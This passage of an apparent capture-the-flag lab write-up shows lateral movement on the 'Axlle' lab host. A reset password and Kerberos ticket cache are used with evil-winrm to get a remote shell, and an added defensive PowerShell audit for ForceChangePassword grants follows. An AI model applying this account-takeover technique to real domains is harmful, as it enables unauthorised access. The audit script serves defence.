baz.humphries


In the earlier stage, I reset the password of the baz.humphries user by leveraging the ForceChangePassword privilege held by the dallon.matrix user, and the new credentials were then validated. The baz.humphries user is a member of the Remote Management Users group, which permits WinRM logons to the host.

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=baz.humphries@mainframe.axlle.htb.ccache evil-winrm -i mainframe.axlle.htb -r AXLLE.HTB  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> whoami
axlle\baz.humphries
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> hostname
MAINFRAME
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::133
   IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
   Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

Lateral movement to the target system completed as the baz.humphries user via evil-winrm, authenticating with the Kerberos ticket cache supplied through KRB5CCNAME rather than the password itself.
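As an added defensive check that is not part of the original writeup: the path above needs two conditions, a principal holding ForceChangePassword (the User-Force-Change-Password extended right) over a user object, and that user sitting in Remote Management Users. The PowerShell below audits exactly that combination; it assumes the RSAT ActiveDirectory module, a domain-joined session with directory read access, and the AXLLE domain naming, and `Get-ForceChangePasswordGrants` is a name chosen here for the example.

```powershell
# Added audit example (not from the original writeup). Assumes the RSAT
# ActiveDirectory module is installed and the session can read the directory.
Import-Module ActiveDirectory

# Well-known rightsGuid of the User-Force-Change-Password extended right
$ForceChangePwdGuid = [Guid]'00299570-246d-11d0-a768-00aa006e0529'
# An empty ObjectType on an ExtendedRight/GenericAll ACE covers every extended right
$AllGuid = [Guid]'00000000-0000-0000-0000-000000000000'

function Get-ForceChangePasswordGrants {
    param([string]$GroupName = 'Remote Management Users')

    # Only users who can actually log on over WinRM matter for this path
    $targets = Get-ADGroupMember -Identity $GroupName -Recursive |
        Where-Object objectClass -eq 'user'

    foreach ($t in $targets) {
        $acl = Get-Acl -Path ("AD:\" + $t.distinguishedName)
        foreach ($ace in $acl.Access) {
            $isExtended  = $ace.ActiveDirectoryRights -band `
                           [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
            $matchesRight = ($ace.ObjectType -eq $ForceChangePwdGuid) -or
                            ($ace.ObjectType -eq $AllGuid)
            if ($ace.AccessControlType -eq 'Allow' -and $isExtended -and $matchesRight) {
                [pscustomobject]@{
                    Target    = $t.SamAccountName
                    Trustee   = $ace.IdentityReference.Value
                    Right     = 'ForceChangePassword'
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Built-in and tier-0 principals are expected to hold this right; anything else
# (for example a regular domain user such as dallon.matrix) should be reviewed.
$expected = @(
    'NT AUTHORITY\SELF', 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
    'AXLLE\Domain Admins', 'AXLLE\Enterprise Admins', 'AXLLE\Account Operators'
)
Get-ForceChangePasswordGrants |
    Where-Object { $_.Trustee -notin $expected } |
    Format-Table -AutoSize
```

Any non-expected trustee in the output is a password-reset path onto a WinRM-capable account and should be removed or justified; pairing this with Security event 4724 (account password reset) on the domain controllers gives the corresponding detection.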